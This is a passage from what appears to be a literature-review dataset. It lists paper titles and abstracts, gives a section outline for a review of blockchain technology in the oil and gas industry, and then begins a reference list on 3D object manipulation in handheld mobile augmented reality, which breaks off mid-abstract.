transaction, before making the final decision. In this paper, we present a review of the Blockchain consensus algorithms that have been researched and that are being applied in some well-known applications at this time. --- paper_title: PPCoin: Peer-to-Peer Crypto-Currency with Proof-of-Stake paper_content: A peer-to-peer crypto-currency design derived from Satoshi Nakamoto’s Bitcoin. Proof-of-stake replaces proof-of-work to provide most of the network security. Under this hybrid design proof-of-work mainly provides initial minting and is largely non-essential in the long run. Security level of the network is not dependent on energy consumption in the long term thus providing an energyefficient and more cost-competitive peer-to-peer crypto-currency. Proof-of-stake is based on coin age and generated by each node via a hashing scheme bearing similarity to Bitcoin’s but over limited search space. Block chain history and transaction settlement are further protected by a centrally broadcasted checkpoint mechanism. --- paper_title: A Survey about Consensus Algorithms Used in Blockchain paper_content: Thanks to its potential in many applications, Blockchain has recently been nominated as one of the technologies exciting intense attention. Blockchain has solved the problem of changing the original low-trust centralized ledger held by a single third-party, to a high-trust decentralized form held by different entities, or in other words, verifying nodes. The key contribution of the work of Blockchain is the consensus algorithm, which decides how agreement is made to append a new block between all nodes in the verifying network. Blockchain algorithms can be categorized into two main groups. The first group is proof-based consensus, which requires the nodes joining the verifying network to show that they are more qualified than the others to do the appending work. The second group is voting-based consensus, which requires nodes in the network to exchange their results of verifying a new block or transaction, before making the final decision. In this paper, we present a review of the Blockchain consensus algorithms that have been researched and that are being applied in some well-known applications at this time. --- paper_title: A privacy-preserving Internet of Things device management scheme based on blockchain paper_content: Blockchain as a new technique has attracted attentions from industry and academics for sharing data across organizations. Many blockchain-based data sharing applications, such as Internet of Things... --- paper_title: Hybrid Cryptographic Protocol for Secure Vehicle Data Sharing Over a Consortium Blockchain paper_content: The blockchain technology has recently attracted increasing interests in a wide range of use-cases. Among those, the management of vehicles' data and life cycle over a blockchain has sparked various research initiatives on a global scale, with the promise to prevent automobile frauds and to enable more collaborations between the involved stakeholders. In this paper, we investigate the problem of securing and sharing vehicles' data over a consortium blockchain, and we describe the architecture of the implemented proof-of-concept. Then, we introduce a novel hybrid cryptographic protocol to secure the access to vehicles' data between the involved stakeholders. Finally, we discuss the lessons learned acquired from the preliminary trials and we highlight the future research challenges and opportunities. --- paper_title: From Pretty Good To Great: Enhancing PGP using Bitcoin and the Blockchain paper_content: PGP is built upon a Distributed Web of Trust in which a user’s trustworthiness is established by others who can vouch through a digital signature for that user’s identity. Preventing its wholesale adoption are a number of inherent weaknesses to include (but not limited to) the following: 1) Trust Relationships are built on a subjective honor system, 2) Only first degree relationships can be fully trusted, 3) Levels of trust are difficult to quantify with actual values, and 4) Issues with the Web of Trust itself (Certification and Endorsement). Although the security that PGP provides is proven to be reliable, it has largely failed to garner large scale adoption. In this paper, we propose several novel contributions to address the aforementioned issues with PGP and associated Web of Trust. To address the subjectivity of the Web of Trust, we provide a new certificate format based on Bitcoin which allows a user to verify a PGP certificate using Bitcoin identity-verification transactions - forming first degree trust relationships that are tied to actual values (i.e., number of Bitcoins transferred during transaction). Secondly, we present the design of a novel Distributed PGP key server that leverages the Bitcoin transaction blockchain to store and retrieve our certificates. --- paper_title: Step by Step Towards Creating a Safe Smart Contract: Lessons and Insights from a Cryptocurrency Lab paper_content: We document our experiences in teaching smart contract programming to undergraduate students at the University of Maryland, the first pedagogical attempt of its kind. Since smart contracts deal directly with the movement of valuable currency units between contractual parties, security of a contract program is of paramount importance. --- paper_title: The Internet Blockchain: A Distributed, Tamper-Resistant Transaction Framework for the Internet paper_content: Existing security mechanisms for managing the Internet infrastructural resources like IP addresses, AS numbers, BGP advertisements and DNS mappings rely on a Public Key Infrastructure (PKI) that can be potentially compromised by state actors and Advanced Persistent Threats (APTs). Ideally the Internet infrastructure needs a distributed and tamper-resistant resource management framework which cannot be subverted by any single entity. A secure, distributed ledger enables such a mechanism and the blockchain is the best known example of distributed ledgers. In this paper, we propose the use of a blockchain based mechanism to secure the Internet BGP and DNS infrastructure. While the blockchain has scaling issues to be overcome, the key advantages of such an approach include the elimination of any PKI-like root of trust, a verifiable and distributed transaction history log, multi-signature based authorizations for enhanced security, easy extensibility and scriptable programmability to secure new types of Internet resources and potential for a built in cryptocurrency. A tamper resistant DNS infrastructure also ensures that it is not possible for the application level PKI to spoof HTTPS traffic. --- paper_title: Blockchains and Smart Contracts for the Internet of Things paper_content: Motivated by the recent explosion of interest around blockchains, we examine whether they make a good fit for the Internet of Things (IoT) sector. Blockchains allow us to have a distributed peer-to-peer network where non-trusting members can interact with each other without a trusted intermediary, in a verifiable manner. We review how this mechanism works and also look into smart contracts—scripts that reside on the blockchain that allow for the automation of multi-step processes. We then move into the IoT domain, and describe how a blockchain-IoT combination: 1) facilitates the sharing of services and resources leading to the creation of a marketplace of services between devices and 2) allows us to automate in a cryptographically verifiable manner several existing, time-consuming workflows. We also point out certain issues that should be considered before the deployment of a blockchain network in an IoT setting: from transactional privacy to the expected value of the digitized assets traded on the network. Wherever applicable, we identify solutions and workarounds. Our conclusion is that the blockchain-IoT combination is powerful and can cause significant transformations across several industries, paving the way for new business models and novel, distributed applications. --- paper_title: The Paradox of Compliance: Infringements and Delays in Transposing European Union Directives paper_content: What impact does the negotiation stage prior to the adoption of international agreements have on the subsequent implementation stage? We address this question by examining the linkages between decision making on European Union directives and any subsequent infringements and delays in national transposition. We formulate a preference-based explanation of failures to comply, which focuses on states’ incentives to deviate and the amount of discretion granted to states. This is compared with state-based explanations that focus on country-specific characteristics. Infringements are more likely when states disagree with the content of directives and the directives provide them with little discretion. Granting discretion to member states, however, tends to lead to longer delays in transposition. We find no evidence of country-specific effects. --- paper_title: Disclosure as Governance: The Extractive Industries Transparency Initiative and Resource Management in the Developing World paper_content: The global promotion of transparency for the extractive sector-oil, gas and mining-has become increasingly accepted as an appropriate solution to weaknesses in governance in resource-rich developing nations. Proponents argue that if extractive firms disclose publicly their payments to governments, citizens will be able to hold governments accountable. This will improve the management of natural resources, reduce corruption, and mitigate conflict. These beliefs are embodied in the Extractive Industries Transparency Initiative (EITI), initially a unilateral effort launched by Tony Blair that has evolved into a global program. Why has transparency become the solution of choice for managing natural resource wealth, and how has the EITI evolved? This article argues that intersecting transnational networks with complementary global norms facilitated construction of transparency as a solution for management of resource revenues. This in turn promoted the gradual expansion of the institutional architecture, membership, and scope of the EITI despite significant political barriers. (c) 2010 by the Massachusetts Institute of Technology. --- paper_title: Impact of the Dodd-Frank Act on Credit Ratings paper_content: We analyze the impact of the Dodd-Frank Wall Street Reform and Consumer Protection Act (Dodd-Frank) on corporate bond ratings issued by credit rating agencies (CRAs). We find no evidence that Dodd-Frank disciplines CRAs to provide more accurate and informative credit ratings. Instead, following Dodd-Frank, CRAs issue lower ratings, give more false warnings, and issue downgrades that are less informative. These results are consistent with the reputation model of Morris (2001), and suggest that CRAs become more protective of their reputation following the passage of Dodd-Frank. Consistent with Morris (2001), we find that our results are stronger for industries with low Fitch market share, where Moody׳s and Standard & Poor׳s have stronger incentives to protect their reputation (Becker and Milbourn, 2011). Our results are not driven by business cycle effects or firm characteristics, and strengthen as the uncertainty regarding the passage of Dodd-Frank gets resolved. We conclude that increasing the legal and regulatory costs to CRAs might have an adverse effect on the quality of credit ratings. --- paper_title: Blockchain Standards for Compliance and Trust paper_content: Blockchain methods are emerging as practical tools for validation, record-keeping, and access control in addition to their early applications in cryptocurrency. This column explores the options for use of blockchains to enhance security, trust, and compliance in a variety of industry settings and explores the current state of blockchain standards. --- paper_title: ProvChain: A Blockchain-Based Data Provenance Architecture in Cloud Environment with Enhanced Privacy and Availability paper_content: Cloud data provenance is metadata that records the history of the creation and operations performed on a cloud data object. Secure data provenance is crucial for data accountability, forensics and privacy. In this paper, we propose a decentralized and trusted cloud data provenance architecture using blockchain technology. Blockchain-based data provenance can provide tamper-proof records, enable the transparency of data accountability in the cloud, and help to enhance the privacy and availability of the provenance data. We make use of the cloud storage scenario and choose the cloud file as a data unit to detect user operations for collecting provenance data. We design and implement ProvChain, an architecture to collect and verify cloud data provenance, by embedding the provenance data into blockchain transactions. ProvChain operates mainly in three phases: (1) provenance data collection, (2) provenance data storage, and (3) provenance data validation. Results from performance evaluation demonstrate that ProvChain provides security features including tamper-proof provenance, user privacy and reliability with low overhead for the cloud storage applications. --- paper_title: Enabling Blockchain Innovations with Pegged Sidechains paper_content: Since the introduction of Bitcoin[Nak09] in 2009, and the multiple computer science and electronic cash innovations it brought, there has been great interest in the potential of decentralised cryptocurrencies. At the same time, implementation changes to the consensuscritical parts of Bitcoin must necessarily be handled very conservatively. As a result, Bitcoin has greater difficulty than other Internet protocols in adapting to new demands and accommodating new innovation. We propose a new technology, pegged sidechains, which enables bitcoins and other ledger assets to be transferred between multiple blockchains. This gives users access to new and innovative cryptocurrency systems using the assets they already own. By reusing Bitcoin’s currency, these systems can more easily interoperate with each other and with Bitcoin, avoiding the liquidity shortages and market fluctuations associated with new currencies. Since sidechains are separate systems, technical and economic innovation is not hindered. Despite bidirectional transferability between Bitcoin and pegged sidechains, they are isolated: in the case of a cryptographic break (or malicious design) in a sidechain, the damage is entirely confined to the sidechain itself. This paper lays out pegged sidechains, their implementation requirements, and the work needed to fully benefit from the future of interconnected blockchains. ---
Title: Blockchain Technology in the Oil and Gas Industry: A Review of Applications, Opportunities, Challenges, and Risks Section 1: INTRODUCTION Description 1: Introduce the significance of oil and gas resources, current management issues in the industry, and the potential of blockchain technology to address these issues. Section 2: MOTIVATION Description 2: Discuss the motivations behind exploring blockchain technology for the oil and gas industry, emphasizing the need for better understanding and implementation. Section 3: CONTRIBUTIONS Description 3: Summarize the main contributions of the paper, including the discussion of blockchain technologies, their application in the oil and gas industry, and the analysis of their opportunities, challenges, and risks. Section 4: THEORIES OF BLOCKCHAIN Description 4: Provide an overview of the basic theories and key technologies of blockchain, including the concept, characteristics, classification, consensus algorithms, cryptography and security technologies, data record models, and distributed storage systems. Section 5: BLOCKCHAIN IN OIL AND GAS INDUSTRY Description 5: Analyze the potential application scenarios of blockchain technology in the oil and gas industry, including trading, management and decision-making, supervision, and cybersecurity. Present real-world examples. Section 6: DISCUSSIONS Description 6: Discuss the current status, opportunities, challenges, risks, and development trends of blockchain technology in the oil and gas industry. Section 7: CONCLUSIONS Description 7: Summarize the findings and conclusions of the paper, highlighting the potential of blockchain technology in the industry and the steps needed to overcome challenges and risks.
3D Object Manipulation Techniques in Handheld Mobile Augmented Reality Interface: A Review
10
--- paper_title: A Survey of Augmented Reality paper_content: This paper surveys the field of augmented reality AR, in which 3D virtual objects are integrated into a 3D real environment in real time. It describes the medical, manufacturing, visualization, path planning, entertainment, and military applications that have been explored. This paper describes the characteristics of augmented reality systems, including a detailed discussion of the tradeoffs between optical and video blending approaches. Registration and sensing errors are two of the biggest problems in building effective augmented reality systems, so this paper summarizes current efforts to overcome these problems. Future directions and areas requiring further research are discussed. This survey provides a starting point for anyone interested in researching or using augmented reality. --- paper_title: Recent Advances in Augmented Reality paper_content: In 1997, Azuma published a survey on augmented reality (AR). Our goal is to complement, rather than replace, the original survey by presenting representative examples of the new advances. We refer one to the original survey for descriptions of potential applications (such as medical visualization, maintenance and repair of complex equipment, annotation, and path planning); summaries of AR system characteristics (such as the advantages and disadvantages of optical and video approaches to blending virtual and real, problems in display focus and contrast, and system portability); and an introduction to the crucial problem of registration, including sources of registration error and error-reduction strategies. --- paper_title: A Survey of Augmented Reality Technologies, Applications and Limitations paper_content: We are on the verge of ubiquitously adopting Augmented Reality (AR) technologies to enhance our percep- tion and help us see, hear, and feel our environments in new and enriched ways. AR will support us in fields such as education, maintenance, design and reconnaissance, to name but a few. This paper describes the field of AR, including a brief definition and development history, the enabling technologies and their characteristics. It surveys the state of the art by reviewing some recent applications of AR technology as well as some known limitations regarding human factors in the use of AR systems that developers will need to overcome. --- paper_title: A TAXONOMY OF MIXED REALITY VISUAL DISPLAYS paper_content: Paul Milgram received the B.A.Sc. degree from the University of Toronto in 1970, the M.S.E.E. degree from the Technion (Israel) in 1973 and the Ph.D. degree from the University of Toronto in 1980. From 1980 to 1982 he was a ZWO Visiting Scientist and a NATO Postdoctoral in the Netherlands, researching automobile driving behaviour. From 1982 to 1984 he was a Senior Research Engineer in Human Engineering at the National Aerospace Laboratory (NLR) in Amsterdam, where his work involved the modelling of aircraft flight crew activity, advanced display concepts and control loops with human operators in space teleoperation. Since 1986 he has worked at the Industrial Engineering Department of the University of Toronto, where he is currently an Associate Professor and Coordinator of the Human Factors Engineering group. He is also cross appointed to the Department of Psychology. In 1993-94 he was an invited researcher at the ATR Communication Systems Research Laboratories, in Kyoto, Japan. His research interests include display and control issues in telerobotics and virtual environments, stereoscopic video and computer graphics, cognitive engineering, and human factors issues in medicine. He is also President of Translucent Technologies, a company which produces "Plato" liquid crystal visual occlusion spectacles (of which he is the inventor), for visual and psychomotor research. --- paper_title: A Survey of Augmented Reality paper_content: This paper surveys the field of augmented reality AR, in which 3D virtual objects are integrated into a 3D real environment in real time. It describes the medical, manufacturing, visualization, path planning, entertainment, and military applications that have been explored. This paper describes the characteristics of augmented reality systems, including a detailed discussion of the tradeoffs between optical and video blending approaches. Registration and sensing errors are two of the biggest problems in building effective augmented reality systems, so this paper summarizes current efforts to overcome these problems. Future directions and areas requiring further research are discussed. This survey provides a starting point for anyone interested in researching or using augmented reality. --- paper_title: A REVIEW OF 3D GESTURE INTERACTION FOR HANDHELD AUGMENTED REALITY paper_content: Interaction for Handheld Augmented Reality (HAR) is a challenging research topic because of the small screen display and limited input options. Although 2D touch screen input is widely used, 3D gesture interaction is a suggested alternative input method. Recent 3D gesture interaction research mainly focuses on using RGB-Depth cameras to detect the spatial position and pose of fingers, using this data for virtual object manipulations in the AR scene. In this paper we review previous 3D gesture research on handheld interaction metaphors for HAR. We present their novelties as well as limitations, and discuss future research directions of 3D gesture interaction for HAR. Our results indicate that 3D gesture input on HAR is a potential interaction method for assisting a user in many tasks such as in education, urban simulation and 3D games. --- paper_title: Mobile Augmented Reality Survey: From Where We Are to Where We Go paper_content: The boom in the capabilities and features of mobile devices, like smartphones, tablets, and wearables, combined with the ubiquitous and affordable Internet access and the advances in the areas of cooperative networking, computer vision, and mobile cloud computing transformed mobile augmented reality (MAR) from science fiction to a reality. Although mobile devices are more constrained computationalwise from traditional computers, they have a multitude of sensors that can be used to the development of more sophisticated MAR applications and can be assisted from remote servers for the execution of their intensive parts. In this paper, after introducing the reader to the basics of MAR, we present a categorization of the application fields together with some representative examples. Next, we introduce the reader to the user interface and experience in MAR applications and continue with the core system components of the MAR systems. After that, we discuss advances in tracking and registration, since their functionality is crucial to any MAR application and the network connectivity of the devices that run MAR applications together with its importance to the performance of the application. We continue with the importance of data management in MAR systems and the systems performance and sustainability, and before we conclude this survey, we present existing challenging problems. --- paper_title: Perceptual issues in augmented reality revisited paper_content: This paper provides a classification of perceptual issues in augmented reality, created with a visual processing and interpretation pipeline in mind. We organize issues into ones related to the environment, capturing, augmentation, display, and individual user differences. We also illuminate issues associated with more recent platforms such as handhelds or projector-camera systems. Throughout, we describe current approaches to addressing these problems, and suggest directions for future research. --- paper_title: Augmented Reality in Surgery paper_content: Objective To evaluate the history and current knowledge of computer-augmented reality in the field of surgery and its potential goals in education, surgeon training, and patient treatment. Data Sources National Library of Medicine's database and additional library searches. Study Selection Only articles suited to surgical sciences with a well-defined aim of study, methodology, and precise description of outcome were included. Data Synthesis Augmented reality is an effective tool in executing surgical procedures requiring low-performance surgical dexterity; it remains a science determined mainly by stereotactic registration and ergonomics. Strong evidence was found that it is an effective teaching tool for training residents. Weaker evidence was found to suggest a significant influence on surgical outcome, both morbidity and mortality. No evidence of cost-effectiveness was found. Conclusions Augmented reality is a new approach in executing detailed surgical operations. Although its application is in a preliminary stage, further research is needed to evaluate its long-term clinical impact on patients, surgeons, and hospital administrators. Its widespread use and the universal transfer of such technology remains limited until there is a better understanding of registration and ergonomics. --- paper_title: 3D User Interfaces: Theory and Practice paper_content: Foreword. Preface. I. FOUNDATIONS OF 3D USER INTERFACES . 1. Introduction to 3D User Interfaces. What Are 3D User Interfaces? Why 3D User Interfaces? Terminology. Application Areas. Conclusion. 2. 3D User Interfaces: History and Roadmap. History of 3D UIs. Roadmap to 3D UIs. Scope of This Book. Conclusion. II. Hardware Technologies for 3D User Interfaces. 3. 3D User Interface Output Hardware. Introduction. Visual Displays. Auditory Displays. Haptic Displays. Design Guidelines: Choosing Output Devices for 3D User Interfaces. Conclusion. 4. 3D User Interface Input Hardware. Introduction. Desktop Input Devices. Tracking Devices. 3D Mice. Special-Purpose Input Devices. Direct Human Input. Home-Brewed Input Devices. Choosing Input Devices for 3D Interfaces. III. 3D INTERACTION TECHNIQUES. 5. Selection and Manipulation. Introduction. 3D Manipulation Tasks. Manipulation Techniques and Input Devices. Interaction Techniques for 3D Manipulation. Design Guidelines. 6. Travel. Introduction. 3D Travel Tasks. Travel Techniques. Design Guidelines. 7. Wayfinding. Introduction. Theoretical Foundations. User-Centered Wayfinding Support. Environment-Centered Wayfinding Support. Evaluating Wayfinding Aids. Design Guidelines. Conclusion. 8. System Control. Introduction. Classification. Graphical Menus. Voice Commands. Gestural Commands. Tools. Multimodal System Control Techniques. Design Guidelines. Case Study: Mixing System Control Methods. 8.10. Conclusion. 9. Symbolic Input. Introduction. Symbolic Input Tasks. Symbolic Input Techniques. Design Guidelines. Beyond Text and Number Entry. IV. DESIGNING AND DEVELOPING 3D USER INTERFACES. 10. Strategies for Designing and Developing 3D User Interfaces. Introduction. Designing for Humans. Inventing 3D User Interfaces. Design Guidelines. 11. Evaluation of 3D User Interfaces. Introduction. Background. Evaluation Metrics for 3D Interfaces. Distinctive Characteristics of 3D Interface Evaluation. Classification of 3D Evaluation Methods. Two Multimethod Approaches. Guidelines for 3D Interface Evaluation. V. THE FUTURE OF 3D USER INTERFACES. 12. Beyond Virtual: 3D User Interfaces for the Real World. Introduction. AR Interfaces as 3D Data Browsers. 3D Augmented Reality Interfaces. Augmented Surfaces and Tangible Interfaces. Tangible AR Interfaces. Agents in AR. Transitional AR-VR Interfaces. Conclusion. 13. The Future of 3D User Interfaces. Questions about 3D UI Technology. Questions about 3D Interaction Techniques. Questions about 3D UI Design and Development. Questions about 3D UI Evaluation. Million-Dollar Questions. Appendix A: Quick Reference Guide to 3D User Interface Mathematics. Scalars. Vectors. Points. Matrices. Quaternions. Bibliography. Index. --- paper_title: Recent Advances in Augmented Reality paper_content: In 1997, Azuma published a survey on augmented reality (AR). Our goal is to complement, rather than replace, the original survey by presenting representative examples of the new advances. We refer one to the original survey for descriptions of potential applications (such as medical visualization, maintenance and repair of complex equipment, annotation, and path planning); summaries of AR system characteristics (such as the advantages and disadvantages of optical and video approaches to blending virtual and real, problems in display focus and contrast, and system portability); and an introduction to the crucial problem of registration, including sources of registration error and error-reduction strategies. --- paper_title: Historical Oslo on a handheld device – a mobile augmented reality application paper_content: Abstract Mobile augmented reality (AR) applications can provide just-in-time information based on the user's preferences and context and thus improve the tourist experience. Due to various problems, the potential of this technology has yet to be fully exploited. In this paper, we present the design, implementation and evaluation of a mobile AR application for historical Oslo that aims to bring history to life by providing historical pictures of a location, depending on the direction in which the camera is pointing. This application can run offline and is designed as a generic framework where a similar application for a new city can be created by simply replacing the city-specific database. --- paper_title: Trends in augmented reality tracking, interaction and display: A review of ten years of ISMAR paper_content: Although Augmented Reality technology was first developed over forty years ago, there has been little survey work giving an overview of recent research in the field. This paper reviews the ten-year development of the work presented at the ISMAR conference and its predecessors with a particular focus on tracking, interaction and display research. It provides a roadmap for future augmented reality research which will be of great value to this relatively young field, and also for helping researchers decide which topics should be explored when they are beginning their own studies in the area. --- paper_title: The MagicBook: a transitional AR interface paper_content: Abstract The MagicBook is a Mixed Reality interface that uses a real book to seamlessly transport users between Reality and Virtuality. A vision-based tracking method is used to overlay virtual models on real book pages, creating an Augmented Reality (AR) scene. When users see an AR scene they are interested in they can fly inside it and experience it as an immersive Virtual Reality (VR). The interface also supports multi-scale collaboration, allowing multiple users to experience the same virtual environment either from an egocentric or an exocentric perspective. In this paper we describe the MagicBook prototype, potential applications and user feedback. --- paper_title: SlidAR: A 3D positioning method for SLAM-based handheld augmented reality paper_content: Abstract Handheld Augmented Reality (HAR) has the potential to introduce Augmented Reality (AR) to large audiences due to the widespread use of suitable handheld devices. However, many of the current HAR systems are not considered very practical and they do not fully answer to the needs of the users. One of the challenging areas in HAR is the in-situ AR content creation where the correct and accurate positioning of virtual objects to the real world is fundamental. Due to the hardware limitations of handheld devices and possible restrictions in the environment, the correct 3D positioning of objects can be difficult to achieve we are unable to use AR markers or correctly map the 3D structure of the environment. We present SlidAR, a 3D positioning for Simultaneous Localization And Mapping (SLAM) based HAR systems. SlidAR utilizes 3D ray-casting and epipolar geometry for virtual object positioning. It does not require a perfect 3D reconstruction of the environment nor any virtual depth cues. We have conducted a user experiment to evaluate the efficiency of SlidAR method against an existing device-centric positioning method that we call HoldAR. Results showed that SlidAR was significantly faster, required significantly less device movement, and also got significantly better subjective evaluation from the test participants. SlidAR also had higher positioning accuracy, although not significantly. --- paper_title: Professional Augmented Reality Browsers for Smartphones: Programming for junaio, Layar and Wikitude paper_content: Create amazing mobile augmented reality apps with junaio, Layar, and Wikitude!Professional Augmented Reality Browsers for Smartphones guides you through creating your own augmented reality apps for the iPhone, Android, Symbian, and bada platforms, featuring fully workable and downloadable source code. You will learn important techniques through hands-on applications, and you will build on those skills as the book progresses.Professional Augmented Reality Browsers for Smartphones:Describes how to use the latitude/longitude coordinate system to build location-aware solutions and tells where to get POIs for your own augmented reality applicationsDetails the leading augmented reality platforms and highlights the best applicationsCovers development for the leading augmented reality browser platforms: Wikitude, Layar, and junaioShows how to build cross-platform location-aware content (Android, iPhone, Symbian, and bada) to display POIs directly in camera viewIncludes tutorials for building 2D and 3D content, storing content in databases, and triggering actions when users reach specific locationswrox.comProgrammer ForumsJoin our Programmer to Programmer forums to ask and answer programming questions about this book, join discussions on the hottest topics in the industry, and connect with fellow programmers from around the world.Code DownloadsTake advantage of free code samples from this book, as well as code samples from hundreds of other books, all ready to use.Read MoreFind articles, ebooks, sample chapters, and tables of contents for hundreds of books, and more reference resources on programming topics that matter to you.Wrox Professional guides are planned and written by working programmers to meet the real-world needs of programmers, developers, and IT professionals. Focused and relevant, they address the issues technology professionals face every day. They provide examples, practical solutions, and expert education in new technologies, all designed to help programmers do a better job. --- paper_title: A study on improving close and distant device movement pose manipulation for hand-held augmented reality paper_content: Hand-held smart devices are equipped with powerful processing units, high resolution screens and cameras, that in combination makes them suitable for video see-through Augmented Reality. Many Augmented Reality applications require interaction, such as selection and 3D pose manipulation. One way to perform intuitive, high precision 3D pose manipulation is by direct or indirect mapping of device movement. There are two approaches to device movement interaction; one fixes the virtual object to the device, which therefore becomes the pivot point for the object, thus makes it difficult to rotate without translate. The second approach avoids latter issue by considering rotation and translation separately, relative to the object's center point. The result of this is that the object instead moves out of view for yaw and pitch rotations. In this paper we study these two techniques and compare them with a modification where user perspective rendering is used to solve the rotation issues. The study showed that the modification improves speed as well as both perceived control and intuitiveness among the subjects. --- paper_title: Handheld Guides in Inspection Tasks: Augmented Reality versus Picture paper_content: Inspection tasks focus on observation of the environment and are required in many industrial domains. Inspectors usually execute these tasks by using a guide such as a paper manual, and directly observing the environment. The effort required to match the information in a guide with the information in an environment and the constant gaze shifts required between the two can severely lower the work efficiency of inspector in performing his/her tasks. Augmented reality (AR) allows the information in a guide to be overlaid directly on an environment. This can decrease the amount of effort required for information matching, thus increasing work efficiency. AR guides on head-mounted displays (HMDs) have been shown to increase efficiency. Handheld AR (HAR) is not as efficient as HMD-AR in terms of manipulability, but is more practical and features better information input and sharing capabilities. In this study, we compared two handheld guides: an AR interface that shows 3D registered annotations, that is, annotations having a fixed 3D position in the AR environment, and a non-AR picture interface that displays non-registered annotations on static images. We focused on inspection tasks that involve high information density and require the user to move, as well as to perform several viewpoint alignments. The results of our comparative evaluation showed that use of the AR interface resulted in lower task completion times, fewer errors, fewer gaze shifts, and a lower subjective workload. We are the first to present findings of a comparative study of an HAR and a picture interface when used in tasks that require the user to move and execute viewpoint alignments, focusing only on direct observation. Our findings can be useful for AR practitioners and psychology researchers. --- paper_title: A New You: From Augmented Reality to Augmented Human paper_content: Traditionally, the field of Human Computer Interaction (HCI) was primarily concerned with designing and investigating interfaces between humans and machines. The primary concern of Surface Computing is also still about designing better interfaces to information. However, with recent technological advances, the concept of "enhancing", "augmenting" or even "re-designing" humans themselves is becoming a very feasible and serious topic of scientific research as well as engineering development. "Augmented Human" is a term that I use to refer to this overall research direction. Augmented Human introduces a fundamental paradigm shift in HCI: from human-computer-interaction to human-computer-integration. In this talk, I will discuss rich possibilities and distinct challenges in enhancing human abilities. I will introduce recent projects conducted by our group including design and applications of wearable eye sensing for augmenting our perception and memory abilities, design of flying cameras as our external eyes, a home appliance that can increase your happiness, an organic physical wall/window that dynamically mediates the environment, and an immersive human-human communication called "JackIn". --- paper_title: Designing an augmented reality multimodal interface for 6dof manipulation techniques paper_content: Augmented Reality (AR) supports natural interaction in physical and virtual worlds, so it has recently given rise to a number of novel interaction modalities. This paper presents a method for using hand-gestures with speech input for multimodal interaction in AR. It focuses on providing an intuitive AR environment which supports natural interaction with virtual objects while sustaining accessible real tasks and interaction mechanisms. The paper reviews previous multimodal interfaces and describes recent studies in AR that employ gesture and speech inputs for multimodal input. It describes an implementation of gesture interaction with speech input in AR for virtual object manipulation. Finally, the paper presents a user evaluation of the technique, showing that it can be used to improve the interaction between virtual and physical elements in an AR environment. --- paper_title: Expected user experience of mobile augmented reality services: a user study in the context of shopping centres paper_content: The technical enablers for mobile augmented reality (MAR) are becoming robust enough to allow the development of MAR services that are truly valuable for consumers. Such services would provide a novel interface to the ubiquitous digital information in the physical world, hence serving in great variety of contexts and everyday human activities. To ensure the acceptance and success of future MAR services, their development should be based on knowledge about potential end users' expectations and requirements. We conducted 16 semi-structured interview sessions with 28 participants in shopping centres, which can be considered as a fruitful context for MAR services. We aimed to elicit new knowledge about (1) the characteristics of the expected user experience and (2) central user requirements related to MAR in such a context. From a pragmatic viewpoint, the participants expected MAR services to catalyse their sense of efficiency, empower them with novel context-sensitive and proactive functionalities and raise their awareness of the information related to their surroundings with an intuitive interface. Emotionally, MAR services were expected to offer stimulating and pleasant experiences, such as playfulness, inspiration, liveliness, collectivity and surprise. The user experience categories and user requirements that were identified can serve as targets for the design of user experience of future MAR services. --- paper_title: Application of Augmented Reality Techniques in Through-life Engineering Services paper_content: Abstract Augmented Reality (AR) is an innovative human-machine interaction that overlays virtual components on a real world environment with many potential applications in different fields, ranging from training activities to everyday life (entertainment, head-up display in car windscreens, etc.). The capability to provide the user of the needed information about a process or a procedure directly on the work environment, is the key factor for considering AR as an effective tool to be also used in Through-life Engineering Services (TES). Many experimental implementations have been made by industries and academic institutions in this research area: applications in remote maintenance, diagnostics, non-destructive testing, repairing and setup activities represent the most meaningful examples carried out in the last few years. These applications have concerned different working environments such as aerospace, railway, industrial plants, machine tools, military equipment, underground pipes, civil constructions, etc. The keynote paper will provide a comprehensive survey by reviewing some recent applications in these areas, emphasizing potential advantages, limits and drawbacks, as well as open issues which could represent new challenges for the future. --- paper_title: Rotation and translation mechanisms for tabletop interaction paper_content: A digital tabletop offers several advantages over other groupware form factors for collaborative applications. However, users of a tabletop system do not share a common perspective for the display of information: what is presented right side up to one participant is upside down for another. In this paper, we survey five different rotation and translation techniques for objects displayed on a direct touch digital tabletop display. We analyze their suitability for interactive tabletops in light of their respective input and output degrees of freedom, as well as the precision and completeness provided by each. We describe various tradeoffs that arise when considering which, when and where each of these techniques might be most useful. --- paper_title: Virtual reality and augmented reality as a training tool for assembly tasks paper_content: In this paper we investigate whether virtual reality (VR) and augmented reality (AR) offer potential for the training of manual skills, such as for assembly tasks, in comparison to conventional media. We present results from experiments that compare assembly completion times for a number of different conditions. We firstly investigate completion times for a task where participants can study an engineering drawing and an assembly plan and then conduct the task. We then investigate the task under various VR conditions and context-free AR. We discuss the relative advantages and limitations of using VR and AR as training media for investigating assembly operations, and we present the results of our experimental work. --- paper_title: Integrated view-input ar interaction for virtual object manipulation using tablets and smartphones paper_content: Lately, mobile augmented reality (AR) has become very popular and is used for many commercial and product promotional activities. However, in almost all mobile AR applications, the user only views annotated information or the preset motion of the virtual object in an AR environment and is unable to interact with the virtual objects as if he/she were interacting with real objects in the real environment. In this paper, in an attempt to realize enhanced intuitive and realistic object manipulation in the mobile AR environment, we propose an integrated view-input AR interaction method, which integrates user device manipulation and virtual object manipulation. The method enables the user to hold a 3D virtual object by touching the displayed object on the 2D touch screen of a mobile device, and to move and rotate the object by moving and rotating the mobile device while viewing the held object by way of the 2D screen of the mobile device. Based on this concept, we implemented three types of integrated methods, namely the Rod, Center, and Touch methods, and conducted a user study to investigate the baseline performance metrics of the proposed method on an AR object manipulation task. The Rod method achieved the highest success rate (91%). Participants' feedback indicated that this is because the Rod method is the most natural, and evoked a fixed mental model that is conceivable in the real environment. These results indicated that visualizing the manipulation point on the screen and restricting the user's interactivity with virtual objects from the user's position of view based on a conceivable mental model would be able to aid the user to achieve precise manipulation. --- paper_title: Advanced Interaction Techniques for Augmented Reality Applications paper_content: Augmented Reality (AR) research has been conducted for several decades, although until recently most AR applications had simple interaction methods using traditional input devices. AR tracking, display technology and software has progressed to the point where commercial applications can be developed. However there are opportunities to provide new advanced interaction techniques for AR applications. In this paper we describe several interaction methods that can be used to provide a better user experience, including tangible user interaction, multimodal input and mobile interaction. --- paper_title: Mobile markerless augmented reality and its application in forensic medicine paper_content: Purpose ::: During autopsy, forensic pathologists today mostly rely on visible indication, tactile perception and experience to determine the cause of death. Although computed tomography (CT) data is often available for the bodies under examination, these data are rarely used due to the lack of radiological workstations in the pathological suite. The data may prevent the forensic pathologist from damaging evidence by allowing him to associate, for example, external wounds to internal injuries. To facilitate 